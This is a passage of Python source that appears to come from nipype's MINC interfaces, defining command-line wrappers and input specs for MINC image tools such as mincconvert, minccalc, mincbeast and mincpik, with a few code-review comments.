desc="input file for converting",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_convert_output.mnc",
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
template = traits.Bool(
desc=(
"Create a template file. The dimensions, variables, and"
"attributes of the input file are preserved but all data it set to zero."
),
argstr="-template",
)
compression = traits.Enum(
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
argstr="-compress %s",
desc="Set the compression level, from 0 (disabled) to 9 (maximum).",
)
chunk = traits.Range(
low=0,
desc="Set the target block size for chunking (0 default, >1 block size).",
argstr="-chunk %d",
)
class ConvertOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Convert(CommandLine):
"""convert between MINC 1 to MINC 2 format.
Examples
--------
>>> from nipype.interfaces.minc import Convert
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> c = Convert(input_file=minc2Dfile, output_file='/tmp/out.mnc', two=True) # Convert to MINC2 format.
>>> c.run() # doctest: +SKIP
"""
input_spec = ConvertInputSpec
output_spec = ConvertOutputSpec
_cmd = "mincconvert"
class CopyInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to copy", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_copy.mnc",
)
_xor_pixel = ("pixel_values", "real_values")
pixel_values = traits.Bool(
desc="Copy pixel values as is.", argstr="-pixel_values", xor=_xor_pixel
)
real_values = traits.Bool(
desc="Copy real pixel intensities (default).",
argstr="-real_values",
xor=_xor_pixel,
)
class CopyOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Copy(CommandLine):
"""
Copy image values from one MINC file to another. Both the input
and output files must exist, and the images in both files must
have an equal number dimensions and equal dimension lengths.
NOTE: This program is intended primarily for use with scripts
such as mincedit. It does not follow the typical design rules of
most MINC command-line tools and therefore should be used only
with caution.
"""
input_spec = CopyInputSpec
output_spec = CopyOutputSpec
_cmd = "minccopy"
class ToEcatInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to convert",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_to_ecat.v",
keep_extension=False,
)
ignore_patient_variable = traits.Bool(
desc="Ignore information from the minc patient variable.",
argstr="-ignore_patient_variable",
)
ignore_study_variable = traits.Bool(
desc="Ignore information from the minc study variable.",
argstr="-ignore_study_variable",
)
ignore_acquisition_variable = traits.Bool(
desc="Ignore information from the minc acquisition variable.",
argstr="-ignore_acquisition_variable",
)
ignore_ecat_acquisition_variable = traits.Bool(
desc="Ignore information from the minc ecat_acquisition variable.",
argstr="-ignore_ecat_acquisition_variable",
)
ignore_ecat_main = traits.Bool(
desc="Ignore information from the minc ecat-main variable.",
argstr="-ignore_ecat_main",
)
ignore_ecat_subheader_variable = traits.Bool(
desc="Ignore information from the minc ecat-subhdr variable.",
argstr="-ignore_ecat_subheader_variable",
)
no_decay_corr_fctr = traits.Bool(
desc="Do not compute the decay correction factors", argstr="-no_decay_corr_fctr"
)
voxels_as_integers = traits.Bool(
desc=(
"Voxel values are treated as integers, scale and"
"calibration factors are set to unity"
),
argstr="-label",
)
class ToEcatOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class ToEcat(CommandLine):
"""Convert a 2D image, a 3D volumes or a 4D dynamic volumes
written in MINC file format to a 2D, 3D or 4D Ecat7 file.
Examples
--------
>>> from nipype.interfaces.minc import ToEcat
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> c = ToEcat(input_file=minc2Dfile)
>>> c.run() # doctest: +SKIP
>>> c = ToEcat(input_file=minc2Dfile, voxels_as_integers=True)
>>> c.run() # doctest: +SKIP
"""
input_spec = ToEcatInputSpec
output_spec = ToEcatOutputSpec
_cmd = "minctoecat"
class DumpInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_dump.txt",
keep_extension=False,
)
_xor_coords_or_header = ("coordinate_data", "header_data")
coordinate_data = traits.Bool(
desc="Coordinate variable data and header information.",
argstr="-c",
xor=_xor_coords_or_header,
)
header_data = traits.Bool(
desc="Header information only, no data.", argstr="-h", xor=_xor_coords_or_header
)
_xor_annotations = ("annotations_brief", "annotations_full")
annotations_brief = traits.Enum(
"c",
"f",
argstr="-b %s",
desc="Brief annotations for C or Fortran indices in data.",
xor=_xor_annotations,
)
annotations_full = traits.Enum(
"c",
"f",
argstr="-f %s",
desc="Full annotations for C or Fortran indices in data.",
xor=_xor_annotations,
)
variables = InputMultiPath(
traits.Str,
desc="Output data for specified variables only.",
sep=",",
argstr="-v %s",
)
line_length = traits.Range(
low=0, desc="Line length maximum in data section (default 80).", argstr="-l %d"
)
netcdf_name = traits.Str(
desc="Name for netCDF (default derived from file name).", argstr="-n %s"
)
precision = traits.Either(
traits.Int(),
traits.Tuple(traits.Int, traits.Int),
desc="Display floating-point values with less precision",
argstr="%s",
) # See _format_arg in Dump for actual formatting.
class DumpOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Dump` (``mincdump``)."""

    output_file = File(desc="output file", exists=True)
class Dump(StdOutCommandLine):
    """Interface to ``mincdump``.

    Dump a MINC file. Typically used in conjunction with mincgen (see Gen).

    Examples
    --------
    >>> from nipype.interfaces.minc import Dump
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> dump = Dump(input_file=minc2Dfile)
    >>> dump.run() # doctest: +SKIP
    >>> dump = Dump(input_file=minc2Dfile, output_file='/tmp/out.txt', precision=(3, 4))
    >>> dump.run() # doctest: +SKIP
    """

    input_spec = DumpInputSpec
    output_spec = DumpOutputSpec
    _cmd = "mincdump"

    def _format_arg(self, name, spec, value):
        # Only "precision" needs special handling; everything else uses the
        # default formatting machinery.
        if name != "precision":
            return super()._format_arg(name, spec, value)
        if isinstance(value, int):
            return "-p %d" % value
        is_int_pair = (
            isinstance(value, tuple)
            and isinstance(value[0], int)
            and isinstance(value[1], int)
        )
        if is_int_pair:
            return "-p %d,%d" % value
        raise ValueError("Invalid precision argument: " + str(value))
class AverageInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Average` (``mincaverage``).

    Exactly one of ``input_files`` or ``filelist`` supplies the inputs.
    """

    _xor_input_files = ("input_files", "filelist")
    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s)",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
        xor=_xor_input_files,
    )
    filelist = File(
        desc="Specify the name of a file containing input file names.",
        argstr="-filelist %s",
        exists=True,
        mandatory=True,
        xor=_xor_input_files,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_averaged.mnc",
    )
    two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    _xor_verbose = ("verbose", "quiet")
    verbose = traits.Bool(
        desc="Print out log messages (default).", argstr="-verbose", xor=_xor_verbose
    )
    quiet = traits.Bool(
        desc="Do not print out log messages.", argstr="-quiet", xor=_xor_verbose
    )
    debug = traits.Bool(desc="Print out debugging messages.", argstr="-debug")
    _xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
    check_dimensions = traits.Bool(
        desc="Check that dimension info matches across files (default).",
        argstr="-check_dimensions",
        xor=_xor_check_dimensions,
    )
    no_check_dimensions = traits.Bool(
        desc="Do not check dimension info.",
        argstr="-nocheck_dimensions",
        xor=_xor_check_dimensions,
    )
    # Output sample-format flags: at most one of these may be chosen.
    _xor_format = (
        "format_filetype",
        "format_byte",
        "format_short",
        "format_int",
        "format_long",
        "format_float",
        "format_double",
        "format_signed",
        "format_unsigned",
    )
    format_filetype = traits.Bool(
        desc="Use data type of first file (default).",
        argstr="-filetype",
        xor=_xor_format,
    )
    format_byte = traits.Bool(
        desc="Write out byte data.", argstr="-byte", xor=_xor_format
    )
    format_short = traits.Bool(
        desc="Write out short integer data.", argstr="-short", xor=_xor_format
    )
    format_int = traits.Bool(
        desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
    )
    format_long = traits.Bool(
        desc="Superseded by -int.", argstr="-long", xor=_xor_format
    )
    format_float = traits.Bool(
        desc="Write out single-precision floating-point data.",
        argstr="-float",
        xor=_xor_format,
    )
    format_double = traits.Bool(
        desc="Write out double-precision floating-point data.",
        argstr="-double",
        xor=_xor_format,
    )
    format_signed = traits.Bool(
        desc="Write signed integer data.", argstr="-signed", xor=_xor_format
    )
    format_unsigned = traits.Bool(
        desc="Write unsigned integer data (default).",
        argstr="-unsigned",
        xor=_xor_format,
    )
    max_buffer_size_in_kb = traits.Range(
        low=0,
        desc="Specify the maximum size of the internal buffers (in kbytes).",
        value=4096,
        usedefault=True,
        argstr="-max_buffer_size_in_kb %d",
    )
    _xor_normalize = ("normalize", "nonormalize")
    normalize = traits.Bool(
        desc="Normalize data sets for mean intensity.",
        argstr="-normalize",
        xor=_xor_normalize,
    )
    nonormalize = traits.Bool(
        desc="Do not normalize data sets (default).",
        argstr="-nonormalize",
        xor=_xor_normalize,
    )
    voxel_range = traits.Tuple(
        traits.Int,
        traits.Int,
        argstr="-range %d %d",
        desc="Valid range for output data.",
    )
    sdfile = File(desc="Specify an output sd file (default=none).", argstr="-sdfile %s")
    _xor_copy_header = ("copy_header", "no_copy_header")
    copy_header = traits.Bool(
        desc="Copy all of the header from the first file (default for one file).",
        argstr="-copy_header",
        xor=_xor_copy_header,
    )
    no_copy_header = traits.Bool(
        desc="Do not copy all of the header from the first file (default for many files)).",
        argstr="-nocopy_header",
        xor=_xor_copy_header,
    )
    avgdim = traits.Str(
        desc="Specify a dimension along which we wish to average.", argstr="-avgdim %s"
    )
    binarize = traits.Bool(
        desc="Binarize the volume by looking for values in a given range.",
        argstr="-binarize",
    )
    binrange = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-binrange %s %s",
        desc="Specify a range for binarization. Default value: 1.79769e+308 -1.79769e+308.",
    )
    binvalue = traits.Float(
        desc=(
            "Specify a target value (+/- 0.5) for"
            "binarization. Default value: -1.79769e+308"
        ),
        argstr="-binvalue %s",
    )
    weights = InputMultiPath(
        traits.Str,
        desc='Specify weights for averaging ("<w1>,<w2>,...").',
        sep=",",
        argstr="-weights %s",
    )
    # Only meaningful together with avgdim, hence the requires constraint.
    width_weighted = traits.Bool(
        desc="Weight by dimension widths when -avgdim is used.",
        argstr="-width_weighted",
        requires=("avgdim",),
    )
class AverageOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Average` (``mincaverage``)."""

    output_file = File(desc="output file", exists=True)
class Average(CommandLine):
    """Interface to ``mincaverage``: average a number of MINC files.

    Examples
    --------
    >>> from nipype.interfaces.minc import Average
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> files = [nonempty_minc_data(i) for i in range(3)]
    >>> average = Average(input_files=files, output_file='/tmp/tmp.mnc')
    >>> average.run() # doctest: +SKIP
    """

    _cmd = "mincaverage"
    input_spec = AverageInputSpec
    output_spec = AverageOutputSpec
class BlobInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Blob` (``mincblob``)."""

    input_file = File(
        desc="input file to blob", exists=True, mandatory=True, argstr="%s", position=-2
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_blob.mnc",
    )
    trace = traits.Bool(
        desc="compute the trace (approximate growth and shrinkage) -- FAST",
        argstr="-trace",
    )
    determinant = traits.Bool(
        desc="compute the determinant (exact growth and shrinkage) -- SLOW",
        argstr="-determinant",
    )
    translation = traits.Bool(
        desc="compute translation (structure displacement)", argstr="-translation"
    )
    magnitude = traits.Bool(
        desc="compute the magnitude of the displacement vector", argstr="-magnitude"
    )
class BlobOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Blob` (``mincblob``)."""

    output_file = File(desc="output file", exists=True)
class Blob(CommandLine):
    """Interface to ``mincblob``: calculate blobs from MINC deformation grids.

    Examples
    --------
    >>> from nipype.interfaces.minc import Blob
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> blob = Blob(input_file=minc2Dfile, output_file='/tmp/tmp.mnc', trace=True)
    >>> blob.run() # doctest: +SKIP
    """

    _cmd = "mincblob"
    input_spec = BlobInputSpec
    output_spec = BlobOutputSpec
class CalcInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Calc` (``minccalc``).

    Exactly one of ``input_files`` or ``filelist`` supplies the input
    volumes, and exactly one of ``expression`` or ``expfile`` supplies
    the expression to evaluate.
    """

    _xor_input_files = ("input_files", "filelist")
    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s) for calculation",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
        # Fix: previously only ``filelist`` declared this xor, so the mutual
        # exclusion was enforced in one direction only. Declaring it on both
        # traits matches AverageInputSpec/MathInputSpec in this module.
        xor=_xor_input_files,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_calc.mnc",
    )
    two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    _xor_verbose = ("verbose", "quiet")
    verbose = traits.Bool(
        desc="Print out log messages (default).", argstr="-verbose", xor=_xor_verbose
    )
    quiet = traits.Bool(
        desc="Do not print out log messages.", argstr="-quiet", xor=_xor_verbose
    )
    debug = traits.Bool(desc="Print out debugging messages.", argstr="-debug")
    filelist = File(
        desc="Specify the name of a file containing input file names.",
        argstr="-filelist %s",
        # Fix: the list file must exist, as in AverageInputSpec/MathInputSpec.
        exists=True,
        mandatory=True,
        xor=_xor_input_files,
    )
    _xor_copy_header = ("copy_header", "no_copy_header")
    copy_header = traits.Bool(
        desc="Copy all of the header from the first file.",
        argstr="-copy_header",
        xor=_xor_copy_header,
    )
    no_copy_header = traits.Bool(
        desc="Do not copy all of the header from the first file.",
        argstr="-nocopy_header",
        xor=_xor_copy_header,
    )
    # Output sample-format flags: at most one of these may be chosen.
    _xor_format = (
        "format_filetype",
        "format_byte",
        "format_short",
        "format_int",
        "format_long",
        "format_float",
        "format_double",
        "format_signed",
        "format_unsigned",
    )
    format_filetype = traits.Bool(
        desc="Use data type of first file (default).",
        argstr="-filetype",
        xor=_xor_format,
    )
    format_byte = traits.Bool(
        desc="Write out byte data.", argstr="-byte", xor=_xor_format
    )
    format_short = traits.Bool(
        desc="Write out short integer data.", argstr="-short", xor=_xor_format
    )
    format_int = traits.Bool(
        desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
    )
    format_long = traits.Bool(
        desc="Superseded by -int.", argstr="-long", xor=_xor_format
    )
    format_float = traits.Bool(
        desc="Write out single-precision floating-point data.",
        argstr="-float",
        xor=_xor_format,
    )
    format_double = traits.Bool(
        desc="Write out double-precision floating-point data.",
        argstr="-double",
        xor=_xor_format,
    )
    format_signed = traits.Bool(
        desc="Write signed integer data.", argstr="-signed", xor=_xor_format
    )
    format_unsigned = traits.Bool(
        desc="Write unsigned integer data (default).",
        argstr="-unsigned",
        xor=_xor_format,
    )
    voxel_range = traits.Tuple(
        traits.Int,
        traits.Int,
        argstr="-range %d %d",
        desc="Valid range for output data.",
    )
    max_buffer_size_in_kb = traits.Range(
        low=0,
        desc="Specify the maximum size of the internal buffers (in kbytes).",
        argstr="-max_buffer_size_in_kb %d",
    )
    _xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
    check_dimensions = traits.Bool(
        desc="Check that files have matching dimensions (default).",
        argstr="-check_dimensions",
        xor=_xor_check_dimensions,
    )
    no_check_dimensions = traits.Bool(
        desc="Do not check that files have matching dimensions.",
        argstr="-nocheck_dimensions",
        xor=_xor_check_dimensions,
    )
    # FIXME Is it sensible to use ignore_nan and propagate_nan at the same
    # time? Document this.
    ignore_nan = traits.Bool(
        desc="Ignore invalid data (NaN) for accumulations.", argstr="-ignore_nan"
    )
    propagate_nan = traits.Bool(
        desc="Invalid data in any file at a voxel produces a NaN (default).",
        argstr="-propagate_nan",
    )
    # FIXME Double-check that these are mutually exclusive?
    _xor_nan_zero_illegal = ("output_nan", "output_zero", "output_illegal_value")
    output_nan = traits.Bool(
        desc="Output NaN when an illegal operation is done (default).",
        argstr="-nan",
        xor=_xor_nan_zero_illegal,
    )
    output_zero = traits.Bool(
        desc="Output zero when an illegal operation is done.",
        argstr="-zero",
        xor=_xor_nan_zero_illegal,
    )
    output_illegal = traits.Bool(
        desc="Value to write out when an illegal operation is done. Default value: 1.79769e+308",
        argstr="-illegal_value",
        xor=_xor_nan_zero_illegal,
    )
    _xor_expression = ("expression", "expfile")
    expression = traits.Str(
        desc="Expression to use in calculations.",
        argstr="-expression '%s'",
        xor=_xor_expression,
        mandatory=True,
    )
    expfile = File(
        desc="Name of file containing expression.",
        argstr="-expfile %s",
        xor=_xor_expression,
        mandatory=True,
    )
    # FIXME test this one, the argstr will probably need tweaking, see
    # _format_arg.
    outfiles = traits.List(
        traits.Tuple(
            traits.Str,
            File,
            argstr="-outfile %s %s",
            desc=(
                "List of (symbol, file) tuples indicating that output should be written"
                "to the specified file, taking values from the symbol which should be"
                "created in the expression (see the EXAMPLES section). If this option"
                "is given, then all non-option arguments are taken as input files."
                "This option can be used multiple times for multiple output files."
            ),
        )
    )
    eval_width = traits.Int(
        desc="Number of voxels to evaluate simultaneously.", argstr="-eval_width %s"
    )
class CalcOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Calc` (``minccalc``)."""

    output_file = File(desc="output file", exists=True)
class Calc(CommandLine):
    """Interface to ``minccalc``: compute an expression using MINC files as input.

    Examples
    --------
    >>> from nipype.interfaces.minc import Calc
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> file0 = nonempty_minc_data(0)
    >>> file1 = nonempty_minc_data(1)
    >>> calc = Calc(input_files=[file0, file1], output_file='/tmp/calc.mnc', expression='A[0] + A[1]') # add files together
    >>> calc.run() # doctest: +SKIP
    """

    _cmd = "minccalc"
    input_spec = CalcInputSpec
    output_spec = CalcOutputSpec
# FIXME mincbbox produces output like
#
# -5.000000 -5.000000 -5.000000 4.800000 2.800000 8.800000
#
# so perhaps this would be better returned as a pair of Python
# lists instead of sending to an output file?
class BBoxInputSpec(StdOutCommandLineInputSpec):
    """Input trait specification for :class:`BBox` (``mincbbox``)."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    output_file = File(
        desc="output file containing bounding box corners",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_bbox.txt",
        keep_extension=False,
    )
    threshold = traits.Int(
        0,
        desc="VIO_Real value threshold for bounding box. Default value: 0.",
        # Fix: "-threshold" takes a value on the mincbbox command line, but the
        # argstr had no placeholder. "%"-formatting a placeholder-free string
        # with an argument raises TypeError, so setting this trait could never
        # have produced a valid command.
        argstr="-threshold %d",
    )
    _xor_one_two = ("one_line", "two_lines")
    one_line = traits.Bool(
        desc="Output on one line (default): start_x y z width_x y z",
        argstr="-one_line",
        xor=_xor_one_two,
    )
    two_lines = traits.Bool(
        desc="""Write output with two rows (start and width).""",
        argstr="-two_lines",
        xor=_xor_one_two,
    )
    format_mincresample = traits.Bool(
        desc="Output format for mincresample: (-step x y z -start x y z -nelements x y z",
        argstr="-mincresample",
    )
    format_mincreshape = traits.Bool(
        desc="Output format for mincreshape: (-start x,y,z -count dx,dy,dz",
        argstr="-mincreshape",
    )
    format_minccrop = traits.Bool(
        desc="Output format for minccrop: (-xlim x1 x2 -ylim y1 y2 -zlim z1 z2",
        argstr="-minccrop",
    )
    # FIXME Not implemented, will clash with our parsing of the output?
    # Command-specific options:
    # Options for logging progress. Default = -verbose.
    #  -verbose:      Write messages indicating progress
    #  -quiet:        Do not write log messages
    #  -debug:        Print out debug info.
class BBoxOutputSpec(TraitedSpec):
    """Output trait specification for :class:`BBox` (``mincbbox``)."""

    output_file = File(desc="output file containing bounding box corners", exists=True)
class BBox(StdOutCommandLine):
    """Interface to ``mincbbox``: determine a bounding box of an image.

    Examples
    --------
    >>> from nipype.interfaces.minc import BBox
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> file0 = nonempty_minc_data(0)
    >>> bbox = BBox(input_file=file0)
    >>> bbox.run() # doctest: +SKIP
    """

    _cmd = "mincbbox"
    input_spec = BBoxInputSpec
    output_spec = BBoxOutputSpec
class BeastInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Beast` (``mincbeast``).

    TODO:
    Command-specific options:
    -verbose: Enable verbose output.
    -positive: Specify mask of positive segmentation (inside mask) instead of the default mask.
    -output_selection: Specify file to output selected files.
    -count: Specify file to output the patch count.
    -mask: Specify a segmentation mask instead of the default mask.
    -no_mask: Do not apply a segmentation mask. Perform the segmentation over the entire image.
    -no_positive: Do not apply a positive mask.
    Generic options for all commands:
    -help: Print summary of command-line options and abort
    -version: Print version number of program and exit
    Copyright (C) 2011 Simon Fristed Eskildsen, Vladimir Fonov,
    Pierrick Coupe, Jose V. Manjon
    This program comes with ABSOLUTELY NO WARRANTY; for details type 'cat COPYING'.
    This is free software, and you are welcome to redistribute it under certain
    conditions; type 'cat COPYING' for details.
    Usage: mincbeast [options] <library dir> <input> <output>
    mincbeast -help
    Get this example to work?
    https://github.com/BIC-MNI/BEaST/blob/master/README.library
    2.3 Source the minc-toolkit (if installed):
    $ source /opt/minc/minc-toolkit-config.sh
    2.4 Generate library by running:
    $ beast_prepareADNIlib -flip <ADNI download directory> <BEaST library directory>
    Example:
    $ sudo beast_prepareADNIlib -flip Downloads/ADNI /opt/minc/share/beast-library-1.1
    3. Test the setup
    3.1 Normalize your data
    $ beast_normalize -modeldir /opt/minc/share/icbm152_model_09c input.mnc normal.mnc normal.xfm
    3.2 Run BEaST
    $ mincbeast /opt/minc/share/beast-library-1.1 normal.mnc brainmask.mnc -conf /opt/minc/share/beast-library-1.1/default.2mm.conf -same_res
    """

    probability_map = traits.Bool(
        desc="Output the probability map instead of crisp mask.", argstr="-probability"
    )
    flip_images = traits.Bool(
        desc="Flip images around the mid-sagittal plane to increase patch count.",
        argstr="-flip",
    )
    load_moments = traits.Bool(
        desc=(
            "Do not calculate moments instead use precalculated"
            "library moments. (for optimization purposes)"
        ),
        argstr="-load_moments",
    )
    fill_holes = traits.Bool(desc="Fill holes in the binary output.", argstr="-fill")
    median_filter = traits.Bool(
        desc="Apply a median filter on the probability map.", argstr="-median"
    )
    nlm_filter = traits.Bool(
        desc="Apply an NLM filter on the probability map (experimental).",
        argstr="-nlm_filter",
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    configuration_file = File(
        desc="Specify configuration file.", argstr="-configuration %s"
    )
    voxel_size = traits.Int(
        4,
        usedefault=True,
        desc=(
            "Specify voxel size for calculations (4, 2, or 1)."
            "Default value: 4. Assumes no multiscale. Use configuration"
            "file for multiscale."
        ),
        argstr="-voxel_size %s",
    )
    abspath = traits.Bool(
        desc="File paths in the library are absolute (default is relative to library root).",
        argstr="-abspath",
        usedefault=True,
        default_value=True,
    )
    patch_size = traits.Int(
        1,
        usedefault=True,
        desc="Specify patch size for single scale approach. Default value: 1.",
        argstr="-patch_size %s",
    )
    search_area = traits.Int(
        2,
        usedefault=True,
        desc="Specify size of search area for single scale approach. Default value: 2.",
        argstr="-search_area %s",
    )
    confidence_level_alpha = traits.Float(
        0.5,
        usedefault=True,
        desc="Specify confidence level Alpha. Default value: 0.5",
        argstr="-alpha %s",
    )
    # NOTE(review): the trait default is 0.5 but the desc claims 0.25 (the
    # mincbeast default) — confirm which value is intended before relying on it.
    smoothness_factor_beta = traits.Float(
        0.5,
        usedefault=True,
        desc="Specify smoothness factor Beta. Default value: 0.25",
        argstr="-beta %s",
    )
    threshold_patch_selection = traits.Float(
        0.95,
        usedefault=True,
        desc="Specify threshold for patch selection. Default value: 0.95",
        argstr="-threshold %s",
    )
    number_selected_images = traits.Int(
        20,
        usedefault=True,
        desc="Specify number of selected images. Default value: 20",
        argstr="-selection_num %s",
    )
    same_resolution = traits.Bool(
        desc="Output final mask with the same resolution as input file.",
        argstr="-same_resolution",
    )
    library_dir = Directory(
        desc="library directory", position=-3, argstr="%s", mandatory=True
    )
    # NOTE(review): unlike the other input specs in this module, input_file
    # does not declare exists=True — confirm whether that is intentional.
    input_file = File(desc="input file", position=-2, argstr="%s", mandatory=True)
    output_file = File(
        desc="output file",
        position=-1,
        argstr="%s",
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_beast_mask.mnc",
    )
class BeastOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Beast` (``mincbeast``)."""

    output_file = File(desc="output mask file", exists=True)
class Beast(CommandLine):
    """Interface to ``mincbeast``.

    Extract a brain image using BEaST (Brain Extraction using
    non-local Segmentation Technique).

    Examples
    --------
    >>> from nipype.interfaces.minc import Beast
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> file0 = nonempty_minc_data(0)
    >>> beast = Beast(input_file=file0)
    >>> beast.run() # doctest: +SKIP
    """

    _cmd = "mincbeast"
    input_spec = BeastInputSpec
    output_spec = BeastOutputSpec
class PikInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Pik` (``mincpik``)."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    _xor_image_type = ("jpg", "png")
    # NOTE(review): neither jpg nor png declares an argstr, so these flags are
    # never placed on the command line from here — presumably the output format
    # is driven by the output_file extension; confirm.
    jpg = traits.Bool(desc="Output a jpg file.", xor=_xor_image_type)
    png = traits.Bool(desc="Output a png file (default).", xor=_xor_image_type)
    output_file = File(
        desc="output file",
        argstr="%s",
        genfile=True,
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s.png",
        keep_extension=False,
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME not implemented: --verbose
    #                        --fake
    #                        --lookup ==> arguments to pass to minclookup
    scale = traits.Int(
        2,
        usedefault=True,
        desc=(
            "Scaling factor for resulting image. By default images are"
            "output at twice their original resolution."
        ),
        argstr="--scale %s",
    )
    width = traits.Int(
        desc="Autoscale the resulting image to have a fixed image width (in pixels).",
        argstr="--width %s",
    )
    depth = traits.Enum(
        8,
        16,
        desc="Bitdepth for resulting image 8 or 16 (MSB machines only!)",
        argstr="--depth %s",
    )
    _xor_title = ("title_string", "title_with_filename")
    # Either a bool (use the input filename as title) or a string (explicit
    # title); the generic "%s" argstr is overridden by Pik._format_arg.
    title = traits.Either(
        traits.Bool(desc="Use input filename as title in resulting image."),
        traits.Str(desc="Add a title to the resulting image."),
        argstr="%s",
    )  # see _format_arg for actual arg string
    title_size = traits.Int(
        desc="Font point size for the title.",
        argstr="--title_size %s",
        requires=["title"],
    )
    annotated_bar = traits.Bool(
        desc="create an annotated bar to match the image (use height of the output image)",
        argstr="--anot_bar",
    )
    # FIXME tuple of floats? Not voxel values? Man page doesn't specify.
    minc_range = traits.Tuple(
        traits.Float,
        traits.Float,
        desc="Valid range of values for MINC file.",
        argstr="--range %s %s",
    )
    _xor_image_range = ("image_range", "auto_range")
    image_range = traits.Tuple(
        traits.Float,
        traits.Float,
        desc="Range of image values to use for pixel intensity.",
        argstr="--image_range %s %s",
        xor=_xor_image_range,
    )
    auto_range = traits.Bool(
        desc="Automatically determine image range using a 5 and 95% PcT. (histogram)",
        argstr="--auto_range",
        xor=_xor_image_range,
    )
    start = traits.Int(
        desc="Slice number to get. (note this is in voxel coordinates).",
        argstr="--slice %s",
    )  # FIXME Int is correct?
    _xor_slice = ("slice_z", "slice_y", "slice_x")
    slice_z = traits.Bool(
        desc="Get an axial/transverse (z) slice.", argstr="-z", xor=_xor_slice
    )
    slice_y = traits.Bool(desc="Get a coronal (y) slice.", argstr="-y", xor=_xor_slice)
    slice_x = traits.Bool(
        desc="Get a sagittal (x) slice.", argstr="-x", xor=_xor_slice
    )  # FIXME typo in man page? sagittal?
    triplanar = traits.Bool(
        desc="Create a triplanar view of the input file.", argstr="--triplanar"
    )
    tile_size = traits.Int(
        desc="Pixel size for each image in a triplanar.", argstr="--tilesize %s"
    )
    _xor_sagittal_offset = ("sagittal_offset", "sagittal_offset_perc")
    sagittal_offset = traits.Int(
        desc="Offset the sagittal slice from the centre.", argstr="--sagittal_offset %s"
    )
    sagittal_offset_perc = traits.Range(
        low=0,
        high=100,
        desc="Offset the sagittal slice by a percentage from the centre.",
        argstr="--sagittal_offset_perc %d",
    )
    _xor_vertical_horizontal = ("vertical_triplanar_view", "horizontal_triplanar_view")
    vertical_triplanar_view = traits.Bool(
        desc="Create a vertical triplanar view (Default).",
        argstr="--vertical",
        xor=_xor_vertical_horizontal,
    )
    horizontal_triplanar_view = traits.Bool(
        desc="Create a horizontal triplanar view.",
        argstr="--horizontal",
        xor=_xor_vertical_horizontal,
    )
    lookup = traits.Str(desc="Arguments to pass to minclookup", argstr="--lookup %s")
class PikOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Pik` (``mincpik``)."""

